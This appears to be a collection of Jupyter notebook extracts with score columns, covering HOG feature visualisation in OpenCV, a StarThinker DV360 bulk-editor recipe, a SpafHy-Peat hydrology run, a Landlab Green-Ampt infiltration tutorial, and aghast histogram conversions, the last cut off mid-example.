# be set such that (y_cells - num_cells_per_block[1]) / v_stride = integer.
v_stride = 1
# Block Stride in pixels (horizantal, vertical). Must be an integer multiple of Cell Size
block_stride = (cell_size[0] * h_stride, cell_size[1] * v_stride)
# Specify the size of the detection window (Region of Interest) in pixels (width, height).
# It must be an integer multiple of Cell Size and it must cover the entire image. Because
# the detection window must be an integer multiple of cell size, depending on the size of
# your cells, the resulting detection window might be slightly smaller than the image.
# This is perfectly ok.
win_size = (x_cells * cell_size[0] , y_cells * cell_size[1])
# Print the shape of the gray scale image for reference
print('\nThe gray scale image has shape: ', gray_image.shape)
print()
# Print the parameters of our HOG descriptor
print('HOG Descriptor Parameters:\n')
print('Window Size:', win_size)
print('Cell Size:', cell_size)
print('Block Size:', block_size)
print('Block Stride:', block_stride)
print('Number of Bins:', num_bins)
print()
# Set the parameters of the HOG descriptor using the variables defined above
hog = cv2.HOGDescriptor(win_size, block_size, block_stride, cell_size, num_bins)
# Compute the HOG Descriptor for the gray scale image
hog_descriptor = hog.compute(gray_image)
# Calculate the total number of blocks along the width of the detection window
tot_bx = np.uint32(((x_cells - num_cells_per_block[0]) / h_stride) + 1)
# Calculate the total number of blocks along the height of the detection window
tot_by = np.uint32(((y_cells - num_cells_per_block[1]) / v_stride) + 1)
# Calculate the total number of elements in the feature vector
tot_els = (tot_bx) * (tot_by) * num_cells_per_block[0] * num_cells_per_block[1] * num_bins
# Reshape the feature vector to [blocks_y, blocks_x, num_cells_per_block_x, num_cells_per_block_y, num_bins].
# The blocks_x and blocks_y will be transposed so that the first index (blocks_y) referes to the row number
# and the second index to the column number. This will be useful later when we plot the feature vector, so
# that the feature vector indexing matches the image indexing.
hog_descriptor_reshaped = hog_descriptor.reshape(tot_bx,
tot_by,
num_cells_per_block[0],
num_cells_per_block[1],
num_bins).transpose((1, 0, 2, 3, 4))
# Create an array that will hold the average gradients for each cell
ave_grad = np.zeros((y_cells, x_cells, num_bins))
# Create an array that will count the number of histograms per cell
hist_counter = np.zeros((y_cells, x_cells, 1))
# Add up all the histograms for each cell and count the number of histograms per cell
for i in range (num_cells_per_block[0]):
for j in range(num_cells_per_block[1]):
ave_grad[i:tot_by + i,
j:tot_bx + j] += hog_descriptor_reshaped[:, :, i, j, :]
hist_counter[i:tot_by + i,
j:tot_bx + j] += 1
# Calculate the average gradient for each cell
ave_grad /= hist_counter
# Calculate the total number of vectors we have in all the cells.
len_vecs = ave_grad.shape[0] * ave_grad.shape[1] * ave_grad.shape[2]
# Create an array that has num_bins equally spaced between 0 and 180 degress in radians.
deg = np.linspace(0, np.pi, num_bins, endpoint = False)
# Each cell will have a histogram with num_bins. For each cell, plot each bin as a vector (with its magnitude
# equal to the height of the bin in the histogram, and its angle corresponding to the bin in the histogram).
# To do this, create rank 1 arrays that will hold the (x,y)-coordinate of all the vectors in all the cells in the
# image. Also, create the rank 1 arrays that will hold all the (U,V)-components of all the vectors in all the
# cells in the image. Create the arrays that will hold all the vector positons and components.
U = np.zeros((len_vecs))
V = np.zeros((len_vecs))
X = np.zeros((len_vecs))
Y = np.zeros((len_vecs))
# Set the counter to zero
counter = 0
# Use the cosine and sine functions to calculate the vector components (U,V) from their maginitudes. Remember the
# cosine and sine functions take angles in radians. Calculate the vector positions and magnitudes from the
# average gradient array
for i in range(ave_grad.shape[0]):
for j in range(ave_grad.shape[1]):
for k in range(ave_grad.shape[2]):
U[counter] = ave_grad[i,j,k] * np.cos(deg[k])
V[counter] = ave_grad[i,j,k] * np.sin(deg[k])
X[counter] = (cell_size[0] / 2) + (cell_size[0] * i)
Y[counter] = (cell_size[1] / 2) + (cell_size[1] * j)
counter = counter + 1
# Create the bins in degress to plot our histogram.
angle_axis = np.linspace(0, 180, num_bins, endpoint = False)
angle_axis += ((angle_axis[1] - angle_axis[0]) / 2)
# Create a figure with 4 subplots arranged in 2 x 2
fig, ((a,b),(c,d)) = plt.subplots(2,2)
# Set the title of each subplot
a.set(title = 'Gray Scale Image\n(Click to Zoom)')
b.set(title = 'HOG Descriptor\n(Click to Zoom)')
c.set(title = 'Zoom Window', xlim = (0, 18), ylim = (0, 18), autoscale_on = False)
d.set(title = 'Histogram of Gradients')
# Plot the gray scale image
a.imshow(gray_image, cmap = 'gray')
a.set_aspect(aspect = 1)
# Plot the feature vector (HOG Descriptor)
b.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 5)
b.invert_yaxis()
b.set_aspect(aspect = 1)
b.set_facecolor('black')
# Define function for interactive zoom
def onpress(event):
#Unless the left mouse button is pressed do nothing
if event.button != 1:
return
# Only accept clicks for subplots a and b
if event.inaxes in [a, b]:
# Get mouse click coordinates
x, y = event.xdata, event.ydata
# Select the cell closest to the mouse click coordinates
cell_num_x = np.uint32(x / cell_size[0])
cell_num_y = np.uint32(y / cell_size[1])
# Set the edge coordinates of the rectangle patch
edgex = x - (x % cell_size[0])
edgey = y - (y % cell_size[1])
# Create a rectangle patch that matches the the cell selected above
rect = patches.Rectangle((edgex, edgey),
cell_size[0], cell_size[1],
linewidth = 1,
edgecolor = 'magenta',
facecolor='none')
# A single patch can only be used in a single plot. Create copies
# of the patch to use in the other subplots
rect2 = copy.copy(rect)
rect3 = copy.copy(rect)
# Update all subplots
a.clear()
a.set(title = 'Gray Scale Image\n(Click to Zoom)')
a.imshow(gray_image, cmap = 'gray')
a.set_aspect(aspect = 1)
a.add_patch(rect)
b.clear()
b.set(title = 'HOG Descriptor\n(Click to Zoom)')
b.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 5)
b.invert_yaxis()
b.set_aspect(aspect = 1)
b.set_facecolor('black')
b.add_patch(rect2)
c.clear()
c.set(title = 'Zoom Window')
c.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 1)
c.set_xlim(edgex - cell_size[0], edgex + (2 * cell_size[0]))
c.set_ylim(edgey - cell_size[1], edgey + (2 * cell_size[1]))
c.invert_yaxis()
c.set_aspect(aspect = 1)
c.set_facecolor('black')
c.add_patch(rect3)
d.clear()
d.set(title = 'Histogram of Gradients')
d.grid()
d.set_xlim(0, 180)
d.set_xticks(angle_axis)
d.set_xlabel('Angle')
d.bar(angle_axis,
ave_grad[cell_num_y, cell_num_x, :],
180 // num_bins,
align = 'center',
alpha = 0.5,
linewidth = 1.2,
edgecolor = 'k')
fig.canvas.draw()
# Create a connection between the figure and the mouse click
fig.canvas.mpl_connect('button_press_event', onpress)
plt.show()
| 0.749362 | 0.964888 |
#1. Install Dependencies
First install the libraries needed to execute recipes, this only needs to be done once, then click play.
```
!pip install git+https://github.com/google/starthinker
```
#2. Get Cloud Project ID
To run this recipe [requires a Google Cloud Project](https://github.com/google/starthinker/blob/master/tutorials/cloud_project.md), this only needs to be done once, then click play.
```
CLOUD_PROJECT = 'PASTE PROJECT ID HERE'
print("Cloud Project Set To: %s" % CLOUD_PROJECT)
```
#3. Get Client Credentials
To read and write to various endpoints requires [downloading client credentials](https://github.com/google/starthinker/blob/master/tutorials/cloud_client_installed.md), this only needs to be done once, then click play.
```
CLIENT_CREDENTIALS = 'PASTE CREDENTIALS HERE'
print("Client Credentials Set To: %s" % CLIENT_CREDENTIALS)
```
#4. Enter DV360 Bulk Editor Parameters
Allows bulk editing DV360 through Sheets and BigQuery.
1. Select <b>Load Partners</b>, then click <b>Save + Run</b>, then a sheet called DV Editor will be created.
1. In the <b>Partners</b> sheet tab, fill in <i>Filter</i> column then select <b>Load Advertisers</b>, click <b>Save + Run</b>.
1. In the <b>Advertisers</b> sheet tab, fill in <i>Filter</i> column then select <b>Load Campaigns</b>, click <b>Save + Run</b>.
1. In the <b>Campaigns</b> sheet tab, fill in <i>Filter</i> column, optional.
1. Then select <b>Load Insertion Orders And Line Items</b>, click <b>Save + Run</b>.
1. To update values, make changes on all <i>Edit</i> columns.
1. Select <i>Preview</i>, then <b>Save + Run</b>.
1. Check the <b>Audit</b> and <b>Preview</b> tabs to verify commit.
1. To commit changes, select <i>Update</i>, then <b>Save + Run</b>.
1. Check the <b>Success</b> and <b>Error</b> tabs.
1. Update can be run multiple times.
1. Update ONLY changes fields that do not match their original value.
1. Insert operates only on Edit columns, ignores orignal value columns.
1. Carefull when using drag to copy rows, values are incremented automatically.
1. Modify audit logic by visting BigQuery and changing the views.
Modify the values below for your use case, can be done multiple times, then click play.
```
FIELDS = {
'auth_dv': 'user', # Credentials used for dv.
'auth_sheet': 'user', # Credentials used for sheet.
'auth_bigquery': 'service', # Credentials used for bigquery.
'recipe_name': '', # Name of Google Sheet to create.
'recipe_slug': '', # Name of Google BigQuery dataset to create.
'command': 'Load Partners', # Action to take.
}
print("Parameters Set To: %s" % FIELDS)
```
#5. Execute DV360 Bulk Editor
This does NOT need to be modified unless you are changing the recipe, click play.
```
from starthinker.util.project import project
from starthinker.script.parse import json_set_fields
USER_CREDENTIALS = '/content/user.json'
TASKS = [
{
'dataset': {
'__comment__': 'Ensure dataset exists.',
'auth': 'user',
'dataset': {'field': {'name': 'recipe_slug','prefix': 'DV_Editor_','kind': 'string','order': 2,'default': '','description': 'Name of Google BigQuery dataset to create.'}}
}
},
{
'drive': {
'__comment__': 'Copy the default template to sheet with the recipe name',
'auth': 'user',
'copy': {
'source': 'https://docs.google.com/spreadsheets/d/18G6cGo4j5SsY08H8P53R22D_Pm6m-zkE6APd3EDLf2c/',
'destination': {'field': {'name': 'recipe_name','prefix': 'DV Editor ','kind': 'string','order': 3,'default': '','description': 'Name of Google Sheet to create.'}}
}
}
},
{
'dv_editor': {
'__comment': 'Depending on users choice, execute a different part of the solution.',
'auth_dv': {'field': {'name': 'auth_dv','kind': 'authentication','order': 1,'default': 'user','description': 'Credentials used for dv.'}},
'auth_sheets': {'field': {'name': 'auth_sheet','kind': 'authentication','order': 2,'default': 'user','description': 'Credentials used for sheet.'}},
'auth_bigquery': {'field': {'name': 'auth_bigquery','kind': 'authentication','order': 3,'default': 'service','description': 'Credentials used for bigquery.'}},
'sheet': {'field': {'name': 'recipe_name','prefix': 'DV Editor ','kind': 'string','order': 4,'default': '','description': 'Name of Google Sheet to create.'}},
'dataset': {'field': {'name': 'recipe_slug','prefix': 'DV_Editor_','kind': 'string','order': 5,'default': '','description': 'Name of Google BigQuery dataset to create.'}},
'command': {'field': {'name': 'command','kind': 'choice','choices': ['Clear Partners','Clear Advertisers','Clear Campaigns','Clear Insertion Orders and Line Items','Clear Preview','Clear Update','Load Partners','Load Advertisers','Load Campaigns','Load Insertion Orders and Line Items','Preview','Update'],'order': 6,'default': 'Load Partners','description': 'Action to take.'}}
}
}
]
json_set_fields(TASKS, FIELDS)
project.initialize(_recipe={ 'tasks':TASKS }, _project=CLOUD_PROJECT, _user=USER_CREDENTIALS, _client=CLIENT_CREDENTIALS, _verbose=True, _force=True)
project.execute(_force=True)
```
|
github_jupyter
|
!pip install git+https://github.com/google/starthinker
CLOUD_PROJECT = 'PASTE PROJECT ID HERE'
print("Cloud Project Set To: %s" % CLOUD_PROJECT)
CLIENT_CREDENTIALS = 'PASTE CREDENTIALS HERE'
print("Client Credentials Set To: %s" % CLIENT_CREDENTIALS)
FIELDS = {
'auth_dv': 'user', # Credentials used for dv.
'auth_sheet': 'user', # Credentials used for sheet.
'auth_bigquery': 'service', # Credentials used for bigquery.
'recipe_name': '', # Name of Google Sheet to create.
'recipe_slug': '', # Name of Google BigQuery dataset to create.
'command': 'Load Partners', # Action to take.
}
print("Parameters Set To: %s" % FIELDS)
from starthinker.util.project import project
from starthinker.script.parse import json_set_fields
USER_CREDENTIALS = '/content/user.json'
TASKS = [
{
'dataset': {
'__comment__': 'Ensure dataset exists.',
'auth': 'user',
'dataset': {'field': {'name': 'recipe_slug','prefix': 'DV_Editor_','kind': 'string','order': 2,'default': '','description': 'Name of Google BigQuery dataset to create.'}}
}
},
{
'drive': {
'__comment__': 'Copy the default template to sheet with the recipe name',
'auth': 'user',
'copy': {
'source': 'https://docs.google.com/spreadsheets/d/18G6cGo4j5SsY08H8P53R22D_Pm6m-zkE6APd3EDLf2c/',
'destination': {'field': {'name': 'recipe_name','prefix': 'DV Editor ','kind': 'string','order': 3,'default': '','description': 'Name of Google Sheet to create.'}}
}
}
},
{
'dv_editor': {
'__comment': 'Depending on users choice, execute a different part of the solution.',
'auth_dv': {'field': {'name': 'auth_dv','kind': 'authentication','order': 1,'default': 'user','description': 'Credentials used for dv.'}},
'auth_sheets': {'field': {'name': 'auth_sheet','kind': 'authentication','order': 2,'default': 'user','description': 'Credentials used for sheet.'}},
'auth_bigquery': {'field': {'name': 'auth_bigquery','kind': 'authentication','order': 3,'default': 'service','description': 'Credentials used for bigquery.'}},
'sheet': {'field': {'name': 'recipe_name','prefix': 'DV Editor ','kind': 'string','order': 4,'default': '','description': 'Name of Google Sheet to create.'}},
'dataset': {'field': {'name': 'recipe_slug','prefix': 'DV_Editor_','kind': 'string','order': 5,'default': '','description': 'Name of Google BigQuery dataset to create.'}},
'command': {'field': {'name': 'command','kind': 'choice','choices': ['Clear Partners','Clear Advertisers','Clear Campaigns','Clear Insertion Orders and Line Items','Clear Preview','Clear Update','Load Partners','Load Advertisers','Load Campaigns','Load Insertion Orders and Line Items','Preview','Update'],'order': 6,'default': 'Load Partners','description': 'Action to take.'}}
}
}
]
json_set_fields(TASKS, FIELDS)
project.initialize(_recipe={ 'tasks':TASKS }, _project=CLOUD_PROJECT, _user=USER_CREDENTIALS, _client=CLIENT_CREDENTIALS, _verbose=True, _force=True)
project.execute(_force=True)
| 0.318273 | 0.803868 |
### Example of SpafHy-Peat model run
In this example the model is run with the general parameters defined in [parameters.py](parameters.py), the node-specific parameters in [example_inputs/parameters/](example_inputs/parameters/) and the forcing data files in [example_inputs/forcing/](example_inputs/forcing/). The simulation is for 1000 nodes and covers 10 years. Node-specific parameters include:
- [cf.dat](example_inputs/parameters/cf.dat): canopy closure [-]
- [hc.dat](example_inputs/parameters/hc.dat): stand height [m]
- [LAI_decid.dat](example_inputs/parameters/LAI_decid.dat), [LAI_conif.dat](example_inputs/parameters/LAI_conif.dat): one-sided leaf area index of decidious trees and conifers [m2/m2]
- [ditch_depth.dat](example_inputs/parameters/ditch_depth.dat): ditch depth [m]
- [ditch_spacing.dat](example_inputs/parameters/ditch_spacing.dat): ditch spacing [m]
- [latitude.dat](example_inputs/parameters/latitude.dat), [longitude.dat](example_inputs/parameters/longitude.dat): latitude and longitude [deg]
- [soil_id.dat](soil_id/parameters/cf.dat): id connecting node to soil profile parameterization (see parameters.peat_soilprofiles)
- [forcing_id.dat](example_inputs/parameters/forcing_id.dat): id connecting node to forcing file in forcing folder
[cf.dat](example_inputs/parameters/cf.dat), [hc.dat](example_inputs/parameters/hc.dat), [LAI_decid.dat](example_inputs/parameters/LAI_decid.dat), [LAI_conif.dat](example_inputs/parameters/LAI_conif.dat) can be alternatively given for each year separately to represent stand development (value in each column represents one year). In this case, pgen['stand_development'] needs to be defined as True in [parameters.py](parameters.py).
Model has also alternatives to be run with a single forcing file, stand parameterization or soil parameterization. For alternatives see [parameters.py](parameters.py).
##### Running model
```
from model_driver import driver
outputfile = driver(create_ncf=True, folder='example_inputs')
```
##### Reading results
Model results are written in netCDF4-file, which can be imported as axarray. Output variables stored during simulation can be controlled in parameters.py.
```
from iotools import read_results
results = read_results(outputfile)
print(results)
```
##### Plotting some results
Figures show ground water level [m] and canopy transpiration [mm/d] for 10 first nodes.
```
fig = results['soil_ground_water_level'][:,0,:10].plot.line(x='date')
fig = results['canopy_transpiration'][:,0,:10].plot.line(x='date')
```
|
github_jupyter
|
from model_driver import driver
outputfile = driver(create_ncf=True, folder='example_inputs')
from iotools import read_results
results = read_results(outputfile)
print(results)
fig = results['soil_ground_water_level'][:,0,:10].plot.line(x='date')
fig = results['canopy_transpiration'][:,0,:10].plot.line(x='date')
| 0.296451 | 0.947235 |
# Green-Ampt infiltration and kinematic wave overland flow
This tutorial shows how to create a simple model of rainfall, infiltration, runoff, and overland flow, using two hydrologic components: `SoilInfiltrationGreenAmpt` and `KinwaveImplicitOverlandFlow`.
*(Greg Tucker, September 2021)*
```
import numpy as np
import matplotlib.pyplot as plt
from landlab import imshow_grid, RasterModelGrid
from landlab.io import read_esri_ascii
from landlab.components import SoilInfiltrationGreenAmpt, KinwaveImplicitOverlandFlow
```
## Theory
The Green-Ampt method was introduced by Green and Ampt (1911) as a means of approximating the rate of water infiltration into soil from a layer of surface water. The method represents infiltration in terms of a wetting front that descends into the soil as infiltration progresses. A description of the method can be found in many hydrology textbooks, and in various online resources. The following is a brief summary, using the notation of Julien et al. (1995). The dimensions of each variable are indicated in square brackets, using the common convention that [L] means length, [M] is mass, and [T] is time.
The Green-Ampt method approximates the rate of water infiltration into the soil, $f$ (dimensions of [L/T], representing water volume per unit surface area). Infiltration is driven by two effects: gravitational force, and downward suction (the "paper towel effect") due to a gradient in moisture at the wetting front. The method treats the infiltration rate as a function of the following parameters:
- $K$ - saturated hydraulic conductivity [L/T]
- $H_f$ - capillary pressure head at the wetting front [L]
- $\phi$ - total soil porosity [-]
- $\theta_r$ - residual saturation [-]
- $\theta_e$ - effective porosity $= \phi - \theta_r$ [-]
- $\theta_i$ - initial soil moisture content [-]
- $M_d$ - moisture deficit $=\theta_e - \theta_i$ [-]
- $F$ - total infiltrated water depth [L]
The equation for infiltration rate is:
$$f = K \left( 1 + \frac{H_fM_d}{F} \right)$$
The first term in parentheses represents gravity and the second represents pore suction. If there were no pore suction effect, water would simply infiltrate downward at a rate equal to the hydraulic conductivity, $K$. The suction effect increases this, but it becomes weaker as the cumulative infiltration depth $F$ grows. Effectively, the second term approximates the pore-pressure gradient, which declines as the wetting front descends.
The version used in this component adds a term for the weight of the surface water with depth $H$:
$$f = K \left( 1 + \frac{H_fM_d}{F} + \frac{H}{F} \right)$$
The component uses a simple forward-difference numerical scheme, with time step duration $\Delta t$, in which the infiltration depth during one step is the lesser of the rate calculated above times $\Delta t$, or the available surface water, $H$:
$$\Delta F = \min( f\Delta t, H)$$
Note that the cumulative infitration $F$ must be greater than zero in order to avoid division by zero; therefore, one should initialize the `soil_water_infiltration__depth` to a small positive value.
## Example
### Read in topography from a sample DEM
This is a lidar digital elevation model (DEM) from the West Bijou Creek escarpment on the Colorado High Plains, coarsened to 5 m grid resolution.
Note: it is convenient to use local grid coordinates rather than UTM coordinates, which are what the DEM provides. Therefore, after reading topography data into a grid called `demgrid`, which uses UTM coordinates, we copy over the elevation data into a second grid (`grid`) of the same dimensions that uses local coordinates (i.e., the lower left corner is (0, 0)).
```
# Read topography into a grid
(demgrid, demelev) = read_esri_ascii(
"bijou_gully_subset_5m_edit_dx_filled.asc", name="topographic__elevation"
)
# Create Landlab model grid and assign the DEM elevations to it,
# then display the terrain.
# (note: DEM horizontal and vertical units are meters)
grid = RasterModelGrid(
(demgrid.number_of_node_rows, demgrid.number_of_node_columns), xy_spacing=5.0
)
elev = grid.add_zeros("topographic__elevation", at="node")
elev[:] = demelev
imshow_grid(grid, elev, colorbar_label="Elevation (m)")
```
### Simulate a heavy 5-minute storm
The next bits of code use the `SoilInfiltrationGreenAmpt` and `KinwaveImplicitOverlandFlow` components to model infiltration and runoff during a 5-minute, 90 mm/hr storm.
```
# Create and initialize required input fields for infiltration
# component: depth of surface water, and depth (water volume per
# area) of infiltrated water.
depth = grid.add_zeros("surface_water__depth", at="node")
infilt = grid.add_zeros("soil_water_infiltration__depth", at="node")
infilt[:] = 1.0e-4 # small amount infiltrated (0.1 mm)
# Instantiate an infiltration component
ga = SoilInfiltrationGreenAmpt(
grid,
)
# Instantiate an overland flow component
kw = KinwaveImplicitOverlandFlow(
grid, runoff_rate=90.0, roughness=0.1, depth_exp=5.0 / 3.0
)
# Set time step and storm duration
dt = 10.0 # time step, sec
storm_duration = 300.0 # storm duration, sec
report_every = 60.0 # report progress this often
nsteps = int(storm_duration / dt)
next_report = report_every
# Run it for 10 minutes of heavy rain
for i in range(nsteps):
kw.run_one_step(dt)
ga.run_one_step(dt)
if ((i + 1) * dt) >= next_report:
print("Time =", (i + 1) * dt, "sec")
next_report += report_every
```
### Plot the cumulative infiltration
The plot below illustrates how the convergence of water in the branches of the gully network leads to greater infiltration, with less infiltration on steeper slopes and higher points in the landscape.
```
imshow_grid(
grid, 1000.0 * infilt, colorbar_label="Infiltration depth (mm)", cmap="GnBu"
)
```
## Optional parameters
The `SoilInfiltrationGreenAmpt` component provides a variety parameters that can be set by the user. A list and description of these can be found in the component's `__init__` docstring, which is printed below:
```
print(SoilInfiltrationGreenAmpt.__init__.__doc__)
```
## References
Green, W. H., & Ampt, G. A. (1911). Studies on Soil Phyics. The Journal of Agricultural Science, 4(1), 1-24.
Julien, P. Y., Sagha๏ฌan, B., and Ogden, F. L. (1995) Raster-based hydrologic modeling of spatially-varied surface runoff, J. Am. Water Resour. As., 31, 523โ536, doi:10.1111/j.17521688.1995.tb04039.x.
Rengers, F. K., McGuire, L. A., Kean, J. W., Staley, D. M., and Hobley, D. (2016) Model simulations of flood and debris flow timing in steep catchments after wildfire, Water Resour. Res., 52, 6041โ6061, doi:10.1002/2015WR018176.
|
github_jupyter
|
import numpy as np
import matplotlib.pyplot as plt
from landlab import imshow_grid, RasterModelGrid
from landlab.io import read_esri_ascii
from landlab.components import SoilInfiltrationGreenAmpt, KinwaveImplicitOverlandFlow
# Read topography into a grid
(demgrid, demelev) = read_esri_ascii(
"bijou_gully_subset_5m_edit_dx_filled.asc", name="topographic__elevation"
)
# Create Landlab model grid and assign the DEM elevations to it,
# then display the terrain.
# (note: DEM horizontal and vertical units are meters)
grid = RasterModelGrid(
(demgrid.number_of_node_rows, demgrid.number_of_node_columns), xy_spacing=5.0
)
elev = grid.add_zeros("topographic__elevation", at="node")
elev[:] = demelev
imshow_grid(grid, elev, colorbar_label="Elevation (m)")
# Create and initialize required input fields for infiltration
# component: depth of surface water, and depth (water volume per
# area) of infiltrated water.
depth = grid.add_zeros("surface_water__depth", at="node")
infilt = grid.add_zeros("soil_water_infiltration__depth", at="node")
infilt[:] = 1.0e-4 # small amount infiltrated (0.1 mm)
# Instantiate an infiltration component
ga = SoilInfiltrationGreenAmpt(
grid,
)
# Instantiate an overland flow component
kw = KinwaveImplicitOverlandFlow(
grid, runoff_rate=90.0, roughness=0.1, depth_exp=5.0 / 3.0
)
# Set time step and storm duration
dt = 10.0 # time step, sec
storm_duration = 300.0 # storm duration, sec
report_every = 60.0 # report progress this often
nsteps = int(storm_duration / dt)
next_report = report_every
# Run it for 10 minutes of heavy rain
for i in range(nsteps):
kw.run_one_step(dt)
ga.run_one_step(dt)
if ((i + 1) * dt) >= next_report:
print("Time =", (i + 1) * dt, "sec")
next_report += report_every
imshow_grid(
grid, 1000.0 * infilt, colorbar_label="Infiltration depth (mm)", cmap="GnBu"
)
print(SoilInfiltrationGreenAmpt.__init__.__doc__)
| 0.503418 | 0.98746 |
# Aghast examples
## Conversions
The main purpose of aghast is to move aggregated, histogram-like statistics (called "ghasts") from one framework to the next. This requires a conversion of high-level domain concepts.
Consider the following example: in Numpy, a histogram is simply a 2-tuple of arrays with special meaningโbin contents, then bin edges.
```
import numpy
numpy_hist = numpy.histogram(numpy.random.normal(0, 1, int(10e6)), bins=80, range=(-5, 5))
numpy_hist
```
We convert that into the aghast equivalent (a "ghast") with a connector (two-function module: `fromnumpy` and `tonumpy`).
```
import aghast.connect.numpy
ghastly_hist = aghast.connect.numpy.fromnumpy(numpy_hist)
ghastly_hist
```
This object is instantiated from a class structure built from simple pieces.
```
ghastly_hist.dump()
```
Now it can be converted to a ROOT histogram with another connector.
```
import aghast.connect.root
root_hist = aghast.connect.root.toroot(ghastly_hist, "root_hist")
root_hist
import ROOT
canvas = ROOT.TCanvas()
root_hist.Draw()
canvas.Draw()
```
And Pandas with yet another connector.
```
import aghast.connect.pandas
pandas_hist = aghast.connect.pandas.topandas(ghastly_hist)
pandas_hist
```
## Serialization
A ghast is also a [Flatbuffers](http://google.github.io/flatbuffers/) object, which has a [multi-lingual](https://google.github.io/flatbuffers/flatbuffers_support.html), [random-access](https://github.com/mzaks/FlatBuffersSwift/wiki/FlatBuffers-Explained), [small-footprint](http://google.github.io/flatbuffers/md__benchmarks.html) serialization:
```
ghastly_hist.tobuffer()
print("Numpy size: ", numpy_hist[0].nbytes + numpy_hist[1].nbytes)
tmessage = ROOT.TMessage()
tmessage.WriteObject(root_hist)
print("ROOT size: ", tmessage.Length())
import pickle
print("Pandas size:", len(pickle.dumps(pandas_hist)))
print("Aghast size: ", len(ghastly_hist.tobuffer()))
```
Aghast is generally forseen as a memory format, like [Apache Arrow](https://arrow.apache.org), but for statistical aggregations. Like Arrow, it reduces the need to implement $N(N - 1)/2$ conversion functions among $N$ statistical libraries to just $N$ conversion functions. (See the figure on Arrow's website.)
## Translation of conventions
Aghast also intends to be as close to zero-copy as possible. This means that it must make graceful translations among conventions. Different histogramming libraries handle overflow bins in different ways:
```
fromroot = aghast.connect.root.fromroot(root_hist)
fromroot.axis[0].binning.dump()
print("Bin contents length:", len(fromroot.counts.array))
ghastly_hist.axis[0].binning.dump()
print("Bin contents length:", len(ghastly_hist.counts.array))
```
And yet we want to be able to manipulate them as though these differences did not exist.
```
sum_hist = fromroot + ghastly_hist
sum_hist.axis[0].binning.dump()
print("Bin contents length:", len(sum_hist.counts.array))
```
The binning structure keeps track of the existence of underflow/overflow bins and where they are located.
* ROOT's convention is to put underflow before the normal bins (`below1`) and overflow after (`above1`), so that the normal bins are effectively 1-indexed.
* Boost.Histogram's convention is to put overflow after the normal bins (`above1`) and underflow after that (`above2`), so that underflow is accessed via `myhist[-1]` in Numpy.
* Numpy histograms don't have underflow/overflow bins.
* Pandas could have `Intervals` that extend to infinity.
Aghast accepts all of these, so that it doesn't have to manipulate the bin contents buffer it receives, but knows how to deal with them if it has to combine histograms that follow different conventions.
## Binning types
All the different axis types have an equivalent in aghast (and not all are single-dimensional).
```
import aghast
aghast.IntegerBinning(5, 10).dump()
aghast.RegularBinning(100, aghast.RealInterval(-5, 5)).dump()
aghast.HexagonalBinning(0, 100, 0, 100, aghast.HexagonalBinning.cube_xy).dump()
aghast.EdgesBinning([0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]).dump()
aghast.IrregularBinning([aghast.RealInterval(0, 5),
aghast.RealInterval(10, 100),
aghast.RealInterval(-10, 10)],
overlapping_fill=aghast.IrregularBinning.all).dump()
aghast.CategoryBinning(["one", "two", "three"]).dump()
aghast.SparseRegularBinning([5, 3, -2, 8, -100], 10).dump()
aghast.FractionBinning(error_method=aghast.FractionBinning.clopper_pearson).dump()
aghast.PredicateBinning(["signal region", "control region"]).dump()
aghast.VariationBinning([aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")]),
aghast.Variation([aghast.Assignment("x", "nominal - sigma")])]).dump()
```
The meanings of these binning classes are given in [the specification](https://github.com/diana-hep/aghast/blob/master/specification.adoc#integerbinning), but many of them can be converted into one another, and converting to `CategoryBinning` (strings) often makes the intent clear.
```
aghast.IntegerBinning(5, 10).toCategoryBinning().dump()
aghast.RegularBinning(10, aghast.RealInterval(-5, 5)).toCategoryBinning().dump()
aghast.EdgesBinning([0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]).toCategoryBinning().dump()
aghast.IrregularBinning([aghast.RealInterval(0, 5),
aghast.RealInterval(10, 100),
aghast.RealInterval(-10, 10)],
overlapping_fill=aghast.IrregularBinning.all).toCategoryBinning().dump()
aghast.SparseRegularBinning([5, 3, -2, 8, -100], 10).toCategoryBinning().dump()
aghast.FractionBinning(error_method=aghast.FractionBinning.clopper_pearson).toCategoryBinning().dump()
aghast.PredicateBinning(["signal region", "control region"]).toCategoryBinning().dump()
aghast.VariationBinning([aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")]),
aghast.Variation([aghast.Assignment("x", "nominal - sigma")])]).toCategoryBinning().dump()
```
This technique can also clear up confusion about overflow bins.
```
aghast.RegularBinning(5, aghast.RealInterval(-5, 5), aghast.RealOverflow(
loc_underflow=aghast.BinLocation.above2,
loc_overflow=aghast.BinLocation.above1,
loc_nanflow=aghast.BinLocation.below1
)).toCategoryBinning().dump()
```
# Fancy binning types
You might also be wondering about `FractionBinning`, `PredicateBinning`, and `VariationBinning`.
`FractionBinning` is an axis of two bins: #passing and #total, #failing and #total, or #passing and #failing. Adding it to another axis effectively makes an "efficiency plot."
```
h = aghast.Histogram([aghast.Axis(aghast.FractionBinning()),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(
numpy.array([[ 9, 25, 29, 35, 54, 67, 60, 84, 80, 94],
[ 99, 119, 109, 109, 95, 104, 102, 106, 112, 122]]))))
df = aghast.connect.pandas.topandas(h)
df
df = df.unstack(level=0)
df
df["unweighted", "pass"] / df["unweighted", "all"]
```
`PredicateBinning` means that each bin represents a predicate (if-then rule) in the filling procedure. Aghast doesn't _have_ a filling procedure, but filling-libraries can use this to encode relationships among histograms that a fitting-library can take advantage of, for combined signal-control region fits, for instance. It's possible for those regions to overlap: an input datum might satisfy more than one predicate, and `overlapping_fill` determines which bin(s) were chosen: `first`, `last`, or `all`.
`VariationBinning` means that each bin represents a variation of one of the paramters used to calculate the fill-variables. This is used to determine sensitivity to systematic effects, by varying them and re-filling. In this kind of binning, the same input datum enters every bin.
```
xdata = numpy.random.normal(0, 1, int(1e6))
sigma = numpy.random.uniform(-0.1, 0.8, int(1e6))
h = aghast.Histogram([aghast.Axis(aghast.VariationBinning([
